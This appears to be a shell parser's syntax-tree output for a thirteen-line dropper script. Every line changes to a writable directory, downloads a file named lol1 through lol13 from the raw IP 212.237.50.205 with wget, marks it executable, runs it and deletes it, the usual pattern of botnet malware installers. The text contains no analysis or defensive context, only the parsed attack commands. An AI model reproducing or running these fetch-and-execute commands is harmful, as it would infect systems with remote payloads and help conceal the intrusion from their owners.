ListNode(lineno=2, pos=(12, 134), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 98), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 98), word='http://212.237.50.205/lol1'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(98, 99)),
  CommandNode(lineno=2, pos=(100, 113), parts=[
    WordNode(lineno=2, pos=(100, 105), word='chmod'),
    WordNode(lineno=2, pos=(106, 108), word='+x'),
    WordNode(lineno=2, pos=(109, 113), word='lol1'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(113, 114)),
  CommandNode(lineno=2, pos=(115, 121), parts=[
    WordNode(lineno=2, pos=(115, 121), word='./lol1'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(121, 122)),
  CommandNode(lineno=2, pos=(123, 134), parts=[
    WordNode(lineno=2, pos=(123, 125), word='rm'),
    WordNode(lineno=2, pos=(126, 129), word='-rf'),
    WordNode(lineno=2, pos=(130, 134), word='lol1'),
  ]),
])
ListNode(lineno=3, pos=(135, 257), parts=[
  CommandNode(lineno=3, pos=(135, 142), parts=[
    WordNode(lineno=3, pos=(135, 137), word='cd'),
    WordNode(lineno=3, pos=(138, 142), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(143, 145)),
  CommandNode(lineno=3, pos=(146, 157), parts=[
    WordNode(lineno=3, pos=(146, 148), word='cd'),
    WordNode(lineno=3, pos=(149, 157), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(158, 160)),
  CommandNode(lineno=3, pos=(161, 168), parts=[
    WordNode(lineno=3, pos=(161, 163), word='cd'),
    WordNode(lineno=3, pos=(164, 168), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(169, 171)),
  CommandNode(lineno=3, pos=(172, 180), parts=[
    WordNode(lineno=3, pos=(172, 174), word='cd'),
    WordNode(lineno=3, pos=(175, 180), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(181, 183)),
  CommandNode(lineno=3, pos=(184, 188), parts=[
    WordNode(lineno=3, pos=(184, 186), word='cd'),
    WordNode(lineno=3, pos=(187, 188), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(188, 189)),
  CommandNode(lineno=3, pos=(190, 221), parts=[
    WordNode(lineno=3, pos=(190, 194), word='wget'),
    WordNode(lineno=3, pos=(195, 221), word='http://212.237.50.205/lol2'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(221, 222)),
  CommandNode(lineno=3, pos=(223, 236), parts=[
    WordNode(lineno=3, pos=(223, 228), word='chmod'),
    WordNode(lineno=3, pos=(229, 231), word='+x'),
    WordNode(lineno=3, pos=(232, 236), word='lol2'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(236, 237)),
  CommandNode(lineno=3, pos=(238, 244), parts=[
    WordNode(lineno=3, pos=(238, 244), word='./lol2'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(244, 245)),
  CommandNode(lineno=3, pos=(246, 257), parts=[
    WordNode(lineno=3, pos=(246, 248), word='rm'),
    WordNode(lineno=3, pos=(249, 252), word='-rf'),
    WordNode(lineno=3, pos=(253, 257), word='lol2'),
  ]),
])
ListNode(lineno=4, pos=(258, 380), parts=[
  CommandNode(lineno=4, pos=(258, 265), parts=[
    WordNode(lineno=4, pos=(258, 260), word='cd'),
    WordNode(lineno=4, pos=(261, 265), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(266, 268)),
  CommandNode(lineno=4, pos=(269, 280), parts=[
    WordNode(lineno=4, pos=(269, 271), word='cd'),
    WordNode(lineno=4, pos=(272, 280), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(281, 283)),
  CommandNode(lineno=4, pos=(284, 291), parts=[
    WordNode(lineno=4, pos=(284, 286), word='cd'),
    WordNode(lineno=4, pos=(287, 291), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(292, 294)),
  CommandNode(lineno=4, pos=(295, 303), parts=[
    WordNode(lineno=4, pos=(295, 297), word='cd'),
    WordNode(lineno=4, pos=(298, 303), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(304, 306)),
  CommandNode(lineno=4, pos=(307, 311), parts=[
    WordNode(lineno=4, pos=(307, 309), word='cd'),
    WordNode(lineno=4, pos=(310, 311), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(311, 312)),
  CommandNode(lineno=4, pos=(313, 344), parts=[
    WordNode(lineno=4, pos=(313, 317), word='wget'),
    WordNode(lineno=4, pos=(318, 344), word='http://212.237.50.205/lol3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(344, 345)),
  CommandNode(lineno=4, pos=(346, 359), parts=[
    WordNode(lineno=4, pos=(346, 351), word='chmod'),
    WordNode(lineno=4, pos=(352, 354), word='+x'),
    WordNode(lineno=4, pos=(355, 359), word='lol3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(359, 360)),
  CommandNode(lineno=4, pos=(361, 367), parts=[
    WordNode(lineno=4, pos=(361, 367), word='./lol3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(367, 368)),
  CommandNode(lineno=4, pos=(369, 380), parts=[
    WordNode(lineno=4, pos=(369, 371), word='rm'),
    WordNode(lineno=4, pos=(372, 375), word='-rf'),
    WordNode(lineno=4, pos=(376, 380), word='lol3'),
  ]),
])
ListNode(lineno=5, pos=(381, 503), parts=[
  CommandNode(lineno=5, pos=(381, 388), parts=[
    WordNode(lineno=5, pos=(381, 383), word='cd'),
    WordNode(lineno=5, pos=(384, 388), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(389, 391)),
  CommandNode(lineno=5, pos=(392, 403), parts=[
    WordNode(lineno=5, pos=(392, 394), word='cd'),
    WordNode(lineno=5, pos=(395, 403), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(404, 406)),
  CommandNode(lineno=5, pos=(407, 414), parts=[
    WordNode(lineno=5, pos=(407, 409), word='cd'),
    WordNode(lineno=5, pos=(410, 414), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(415, 417)),
  CommandNode(lineno=5, pos=(418, 426), parts=[
    WordNode(lineno=5, pos=(418, 420), word='cd'),
    WordNode(lineno=5, pos=(421, 426), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(427, 429)),
  CommandNode(lineno=5, pos=(430, 434), parts=[
    WordNode(lineno=5, pos=(430, 432), word='cd'),
    WordNode(lineno=5, pos=(433, 434), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(434, 435)),
  CommandNode(lineno=5, pos=(436, 467), parts=[
    WordNode(lineno=5, pos=(436, 440), word='wget'),
    WordNode(lineno=5, pos=(441, 467), word='http://212.237.50.205/lol4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(467, 468)),
  CommandNode(lineno=5, pos=(469, 482), parts=[
    WordNode(lineno=5, pos=(469, 474), word='chmod'),
    WordNode(lineno=5, pos=(475, 477), word='+x'),
    WordNode(lineno=5, pos=(478, 482), word='lol4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(482, 483)),
  CommandNode(lineno=5, pos=(484, 490), parts=[
    WordNode(lineno=5, pos=(484, 490), word='./lol4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(490, 491)),
  CommandNode(lineno=5, pos=(492, 503), parts=[
    WordNode(lineno=5, pos=(492, 494), word='rm'),
    WordNode(lineno=5, pos=(495, 498), word='-rf'),
    WordNode(lineno=5, pos=(499, 503), word='lol4'),
  ]),
])
ListNode(lineno=6, pos=(504, 626), parts=[
  CommandNode(lineno=6, pos=(504, 511), parts=[
    WordNode(lineno=6, pos=(504, 506), word='cd'),
    WordNode(lineno=6, pos=(507, 511), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(512, 514)),
  CommandNode(lineno=6, pos=(515, 526), parts=[
    WordNode(lineno=6, pos=(515, 517), word='cd'),
    WordNode(lineno=6, pos=(518, 526), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(527, 529)),
  CommandNode(lineno=6, pos=(530, 537), parts=[
    WordNode(lineno=6, pos=(530, 532), word='cd'),
    WordNode(lineno=6, pos=(533, 537), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(538, 540)),
  CommandNode(lineno=6, pos=(541, 549), parts=[
    WordNode(lineno=6, pos=(541, 543), word='cd'),
    WordNode(lineno=6, pos=(544, 549), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(550, 552)),
  CommandNode(lineno=6, pos=(553, 557), parts=[
    WordNode(lineno=6, pos=(553, 555), word='cd'),
    WordNode(lineno=6, pos=(556, 557), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(557, 558)),
  CommandNode(lineno=6, pos=(559, 590), parts=[
    WordNode(lineno=6, pos=(559, 563), word='wget'),
    WordNode(lineno=6, pos=(564, 590), word='http://212.237.50.205/lol5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(590, 591)),
  CommandNode(lineno=6, pos=(592, 605), parts=[
    WordNode(lineno=6, pos=(592, 597), word='chmod'),
    WordNode(lineno=6, pos=(598, 600), word='+x'),
    WordNode(lineno=6, pos=(601, 605), word='lol5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(605, 606)),
  CommandNode(lineno=6, pos=(607, 613), parts=[
    WordNode(lineno=6, pos=(607, 613), word='./lol5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(613, 614)),
  CommandNode(lineno=6, pos=(615, 626), parts=[
    WordNode(lineno=6, pos=(615, 617), word='rm'),
    WordNode(lineno=6, pos=(618, 621), word='-rf'),
    WordNode(lineno=6, pos=(622, 626), word='lol5'),
  ]),
])
ListNode(lineno=7, pos=(627, 749), parts=[
  CommandNode(lineno=7, pos=(627, 634), parts=[
    WordNode(lineno=7, pos=(627, 629), word='cd'),
    WordNode(lineno=7, pos=(630, 634), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(635, 637)),
  CommandNode(lineno=7, pos=(638, 649), parts=[
    WordNode(lineno=7, pos=(638, 640), word='cd'),
    WordNode(lineno=7, pos=(641, 649), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(650, 652)),
  CommandNode(lineno=7, pos=(653, 660), parts=[
    WordNode(lineno=7, pos=(653, 655), word='cd'),
    WordNode(lineno=7, pos=(656, 660), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(661, 663)),
  CommandNode(lineno=7, pos=(664, 672), parts=[
    WordNode(lineno=7, pos=(664, 666), word='cd'),
    WordNode(lineno=7, pos=(667, 672), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(673, 675)),
  CommandNode(lineno=7, pos=(676, 680), parts=[
    WordNode(lineno=7, pos=(676, 678), word='cd'),
    WordNode(lineno=7, pos=(679, 680), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(680, 681)),
  CommandNode(lineno=7, pos=(682, 713), parts=[
    WordNode(lineno=7, pos=(682, 686), word='wget'),
    WordNode(lineno=7, pos=(687, 713), word='http://212.237.50.205/lol6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(713, 714)),
  CommandNode(lineno=7, pos=(715, 728), parts=[
    WordNode(lineno=7, pos=(715, 720), word='chmod'),
    WordNode(lineno=7, pos=(721, 723), word='+x'),
    WordNode(lineno=7, pos=(724, 728), word='lol6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(728, 729)),
  CommandNode(lineno=7, pos=(730, 736), parts=[
    WordNode(lineno=7, pos=(730, 736), word='./lol6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(736, 737)),
  CommandNode(lineno=7, pos=(738, 749), parts=[
    WordNode(lineno=7, pos=(738, 740), word='rm'),
    WordNode(lineno=7, pos=(741, 744), word='-rf'),
    WordNode(lineno=7, pos=(745, 749), word='lol6'),
  ]),
])
ListNode(lineno=8, pos=(750, 872), parts=[
  CommandNode(lineno=8, pos=(750, 757), parts=[
    WordNode(lineno=8, pos=(750, 752), word='cd'),
    WordNode(lineno=8, pos=(753, 757), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(758, 760)),
  CommandNode(lineno=8, pos=(761, 772), parts=[
    WordNode(lineno=8, pos=(761, 763), word='cd'),
    WordNode(lineno=8, pos=(764, 772), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(773, 775)),
  CommandNode(lineno=8, pos=(776, 783), parts=[
    WordNode(lineno=8, pos=(776, 778), word='cd'),
    WordNode(lineno=8, pos=(779, 783), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(784, 786)),
  CommandNode(lineno=8, pos=(787, 795), parts=[
    WordNode(lineno=8, pos=(787, 789), word='cd'),
    WordNode(lineno=8, pos=(790, 795), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(796, 798)),
  CommandNode(lineno=8, pos=(799, 803), parts=[
    WordNode(lineno=8, pos=(799, 801), word='cd'),
    WordNode(lineno=8, pos=(802, 803), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(803, 804)),
  CommandNode(lineno=8, pos=(805, 836), parts=[
    WordNode(lineno=8, pos=(805, 809), word='wget'),
    WordNode(lineno=8, pos=(810, 836), word='http://212.237.50.205/lol7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(836, 837)),
  CommandNode(lineno=8, pos=(838, 851), parts=[
    WordNode(lineno=8, pos=(838, 843), word='chmod'),
    WordNode(lineno=8, pos=(844, 846), word='+x'),
    WordNode(lineno=8, pos=(847, 851), word='lol7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(851, 852)),
  CommandNode(lineno=8, pos=(853, 859), parts=[
    WordNode(lineno=8, pos=(853, 859), word='./lol7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(859, 860)),
  CommandNode(lineno=8, pos=(861, 872), parts=[
    WordNode(lineno=8, pos=(861, 863), word='rm'),
    WordNode(lineno=8, pos=(864, 867), word='-rf'),
    WordNode(lineno=8, pos=(868, 872), word='lol7'),
  ]),
])
ListNode(lineno=9, pos=(873, 995), parts=[
  CommandNode(lineno=9, pos=(873, 880), parts=[
    WordNode(lineno=9, pos=(873, 875), word='cd'),
    WordNode(lineno=9, pos=(876, 880), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(881, 883)),
  CommandNode(lineno=9, pos=(884, 895), parts=[
    WordNode(lineno=9, pos=(884, 886), word='cd'),
    WordNode(lineno=9, pos=(887, 895), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(896, 898)),
  CommandNode(lineno=9, pos=(899, 906), parts=[
    WordNode(lineno=9, pos=(899, 901), word='cd'),
    WordNode(lineno=9, pos=(902, 906), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(907, 909)),
  CommandNode(lineno=9, pos=(910, 918), parts=[
    WordNode(lineno=9, pos=(910, 912), word='cd'),
    WordNode(lineno=9, pos=(913, 918), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(919, 921)),
  CommandNode(lineno=9, pos=(922, 926), parts=[
    WordNode(lineno=9, pos=(922, 924), word='cd'),
    WordNode(lineno=9, pos=(925, 926), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(926, 927)),
  CommandNode(lineno=9, pos=(928, 959), parts=[
    WordNode(lineno=9, pos=(928, 932), word='wget'),
    WordNode(lineno=9, pos=(933, 959), word='http://212.237.50.205/lol8'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(959, 960)),
  CommandNode(lineno=9, pos=(961, 974), parts=[
    WordNode(lineno=9, pos=(961, 966), word='chmod'),
    WordNode(lineno=9, pos=(967, 969), word='+x'),
    WordNode(lineno=9, pos=(970, 974), word='lol8'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(974, 975)),
  CommandNode(lineno=9, pos=(976, 982), parts=[
    WordNode(lineno=9, pos=(976, 982), word='./lol8'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(982, 983)),
  CommandNode(lineno=9, pos=(984, 995), parts=[
    WordNode(lineno=9, pos=(984, 986), word='rm'),
    WordNode(lineno=9, pos=(987, 990), word='-rf'),
    WordNode(lineno=9, pos=(991, 995), word='lol8'),
  ]),
])
ListNode(lineno=10, pos=(996, 1118), parts=[
  CommandNode(lineno=10, pos=(996, 1003), parts=[
    WordNode(lineno=10, pos=(996, 998), word='cd'),
    WordNode(lineno=10, pos=(999, 1003), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1004, 1006)),
  CommandNode(lineno=10, pos=(1007, 1018), parts=[
    WordNode(lineno=10, pos=(1007, 1009), word='cd'),
    WordNode(lineno=10, pos=(1010, 1018), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1019, 1021)),
  CommandNode(lineno=10, pos=(1022, 1029), parts=[
    WordNode(lineno=10, pos=(1022, 1024), word='cd'),
    WordNode(lineno=10, pos=(1025, 1029), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1030, 1032)),
  CommandNode(lineno=10, pos=(1033, 1041), parts=[
    WordNode(lineno=10, pos=(1033, 1035), word='cd'),
    WordNode(lineno=10, pos=(1036, 1041), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1042, 1044)),
  CommandNode(lineno=10, pos=(1045, 1049), parts=[
    WordNode(lineno=10, pos=(1045, 1047), word='cd'),
    WordNode(lineno=10, pos=(1048, 1049), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1049, 1050)),
  CommandNode(lineno=10, pos=(1051, 1082), parts=[
    WordNode(lineno=10, pos=(1051, 1055), word='wget'),
    WordNode(lineno=10, pos=(1056, 1082), word='http://212.237.50.205/lol9'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1082, 1083)),
  CommandNode(lineno=10, pos=(1084, 1097), parts=[
    WordNode(lineno=10, pos=(1084, 1089), word='chmod'),
    WordNode(lineno=10, pos=(1090, 1092), word='+x'),
    WordNode(lineno=10, pos=(1093, 1097), word='lol9'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1097, 1098)),
  CommandNode(lineno=10, pos=(1099, 1105), parts=[
    WordNode(lineno=10, pos=(1099, 1105), word='./lol9'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1105, 1106)),
  CommandNode(lineno=10, pos=(1107, 1118), parts=[
    WordNode(lineno=10, pos=(1107, 1109), word='rm'),
    WordNode(lineno=10, pos=(1110, 1113), word='-rf'),
    WordNode(lineno=10, pos=(1114, 1118), word='lol9'),
  ]),
])
ListNode(lineno=11, pos=(1119, 1245), parts=[
  CommandNode(lineno=11, pos=(1119, 1126), parts=[
    WordNode(lineno=11, pos=(1119, 1121), word='cd'),
    WordNode(lineno=11, pos=(1122, 1126), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1127, 1129)),
  CommandNode(lineno=11, pos=(1130, 1141), parts=[
    WordNode(lineno=11, pos=(1130, 1132), word='cd'),
    WordNode(lineno=11, pos=(1133, 1141), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1142, 1144)),
  CommandNode(lineno=11, pos=(1145, 1152), parts=[
    WordNode(lineno=11, pos=(1145, 1147), word='cd'),
    WordNode(lineno=11, pos=(1148, 1152), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1153, 1155)),
  CommandNode(lineno=11, pos=(1156, 1164), parts=[
    WordNode(lineno=11, pos=(1156, 1158), word='cd'),
    WordNode(lineno=11, pos=(1159, 1164), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1165, 1167)),
  CommandNode(lineno=11, pos=(1168, 1172), parts=[
    WordNode(lineno=11, pos=(1168, 1170), word='cd'),
    WordNode(lineno=11, pos=(1171, 1172), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1172, 1173)),
  CommandNode(lineno=11, pos=(1174, 1206), parts=[
    WordNode(lineno=11, pos=(1174, 1178), word='wget'),
    WordNode(lineno=11, pos=(1179, 1206), word='http://212.237.50.205/lol10'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1206, 1207)),
  CommandNode(lineno=11, pos=(1208, 1222), parts=[
    WordNode(lineno=11, pos=(1208, 1213), word='chmod'),
    WordNode(lineno=11, pos=(1214, 1216), word='+x'),
    WordNode(lineno=11, pos=(1217, 1222), word='lol10'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1222, 1223)),
  CommandNode(lineno=11, pos=(1224, 1231), parts=[
    WordNode(lineno=11, pos=(1224, 1231), word='./lol10'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1231, 1232)),
  CommandNode(lineno=11, pos=(1233, 1245), parts=[
    WordNode(lineno=11, pos=(1233, 1235), word='rm'),
    WordNode(lineno=11, pos=(1236, 1239), word='-rf'),
    WordNode(lineno=11, pos=(1240, 1245), word='lol10'),
  ]),
])
ListNode(lineno=12, pos=(1246, 1372), parts=[
  CommandNode(lineno=12, pos=(1246, 1253), parts=[
    WordNode(lineno=12, pos=(1246, 1248), word='cd'),
    WordNode(lineno=12, pos=(1249, 1253), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1254, 1256)),
  CommandNode(lineno=12, pos=(1257, 1268), parts=[
    WordNode(lineno=12, pos=(1257, 1259), word='cd'),
    WordNode(lineno=12, pos=(1260, 1268), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1269, 1271)),
  CommandNode(lineno=12, pos=(1272, 1279), parts=[
    WordNode(lineno=12, pos=(1272, 1274), word='cd'),
    WordNode(lineno=12, pos=(1275, 1279), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1280, 1282)),
  CommandNode(lineno=12, pos=(1283, 1291), parts=[
    WordNode(lineno=12, pos=(1283, 1285), word='cd'),
    WordNode(lineno=12, pos=(1286, 1291), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1292, 1294)),
  CommandNode(lineno=12, pos=(1295, 1299), parts=[
    WordNode(lineno=12, pos=(1295, 1297), word='cd'),
    WordNode(lineno=12, pos=(1298, 1299), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1299, 1300)),
  CommandNode(lineno=12, pos=(1301, 1333), parts=[
    WordNode(lineno=12, pos=(1301, 1305), word='wget'),
    WordNode(lineno=12, pos=(1306, 1333), word='http://212.237.50.205/lol11'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1333, 1334)),
  CommandNode(lineno=12, pos=(1335, 1349), parts=[
    WordNode(lineno=12, pos=(1335, 1340), word='chmod'),
    WordNode(lineno=12, pos=(1341, 1343), word='+x'),
    WordNode(lineno=12, pos=(1344, 1349), word='lol11'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1349, 1350)),
  CommandNode(lineno=12, pos=(1351, 1358), parts=[
    WordNode(lineno=12, pos=(1351, 1358), word='./lol11'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1358, 1359)),
  CommandNode(lineno=12, pos=(1360, 1372), parts=[
    WordNode(lineno=12, pos=(1360, 1362), word='rm'),
    WordNode(lineno=12, pos=(1363, 1366), word='-rf'),
    WordNode(lineno=12, pos=(1367, 1372), word='lol11'),
  ]),
])
ListNode(lineno=13, pos=(1373, 1499), parts=[
  CommandNode(lineno=13, pos=(1373, 1380), parts=[
    WordNode(lineno=13, pos=(1373, 1375), word='cd'),
    WordNode(lineno=13, pos=(1376, 1380), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1381, 1383)),
  CommandNode(lineno=13, pos=(1384, 1395), parts=[
    WordNode(lineno=13, pos=(1384, 1386), word='cd'),
    WordNode(lineno=13, pos=(1387, 1395), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1396, 1398)),
  CommandNode(lineno=13, pos=(1399, 1406), parts=[
    WordNode(lineno=13, pos=(1399, 1401), word='cd'),
    WordNode(lineno=13, pos=(1402, 1406), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1407, 1409)),
  CommandNode(lineno=13, pos=(1410, 1418), parts=[
    WordNode(lineno=13, pos=(1410, 1412), word='cd'),
    WordNode(lineno=13, pos=(1413, 1418), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1419, 1421)),
  CommandNode(lineno=13, pos=(1422, 1426), parts=[
    WordNode(lineno=13, pos=(1422, 1424), word='cd'),
    WordNode(lineno=13, pos=(1425, 1426), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1426, 1427)),
  CommandNode(lineno=13, pos=(1428, 1460), parts=[
    WordNode(lineno=13, pos=(1428, 1432), word='wget'),
    WordNode(lineno=13, pos=(1433, 1460), word='http://212.237.50.205/lol12'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1460, 1461)),
  CommandNode(lineno=13, pos=(1462, 1476), parts=[
    WordNode(lineno=13, pos=(1462, 1467), word='chmod'),
    WordNode(lineno=13, pos=(1468, 1470), word='+x'),
    WordNode(lineno=13, pos=(1471, 1476), word='lol12'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1476, 1477)),
  CommandNode(lineno=13, pos=(1478, 1485), parts=[
    WordNode(lineno=13, pos=(1478, 1485), word='./lol12'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1485, 1486)),
  CommandNode(lineno=13, pos=(1487, 1499), parts=[
    WordNode(lineno=13, pos=(1487, 1489), word='rm'),
    WordNode(lineno=13, pos=(1490, 1493), word='-rf'),
    WordNode(lineno=13, pos=(1494, 1499), word='lol12'),
  ]),
])
ListNode(lineno=14, pos=(1500, 1626), parts=[
  CommandNode(lineno=14, pos=(1500, 1507), parts=[
    WordNode(lineno=14, pos=(1500, 1502), word='cd'),
    WordNode(lineno=14, pos=(1503, 1507), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1508, 1510)),
  CommandNode(lineno=14, pos=(1511, 1522), parts=[
    WordNode(lineno=14, pos=(1511, 1513), word='cd'),
    WordNode(lineno=14, pos=(1514, 1522), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1523, 1525)),
  CommandNode(lineno=14, pos=(1526, 1533), parts=[
    WordNode(lineno=14, pos=(1526, 1528), word='cd'),
    WordNode(lineno=14, pos=(1529, 1533), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1534, 1536)),
  CommandNode(lineno=14, pos=(1537, 1545), parts=[
    WordNode(lineno=14, pos=(1537, 1539), word='cd'),
    WordNode(lineno=14, pos=(1540, 1545), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1546, 1548)),
  CommandNode(lineno=14, pos=(1549, 1553), parts=[
    WordNode(lineno=14, pos=(1549, 1551), word='cd'),
    WordNode(lineno=14, pos=(1552, 1553), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1553, 1554)),
  CommandNode(lineno=14, pos=(1555, 1587), parts=[
    WordNode(lineno=14, pos=(1555, 1559), word='wget'),
    WordNode(lineno=14, pos=(1560, 1587), word='http://212.237.50.205/lol13'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1587, 1588)),
  CommandNode(lineno=14, pos=(1589, 1603), parts=[
    WordNode(lineno=14, pos=(1589, 1594), word='chmod'),
    WordNode(lineno=14, pos=(1595, 1597), word='+x'),
    WordNode(lineno=14, pos=(1598, 1603), word='lol13'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1603, 1604)),
  CommandNode(lineno=14, pos=(1605, 1612), parts=[
    WordNode(lineno=14, pos=(1605, 1612), word='./lol13'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1612, 1613)),
  CommandNode(lineno=14, pos=(1614, 1626), parts=[
    WordNode(lineno=14, pos=(1614, 1616), word='rm'),
    WordNode(lineno=14, pos=(1617, 1620), word='-rf'),
    WordNode(lineno=14, pos=(1621, 1626), word='lol13'),
  ]),
])
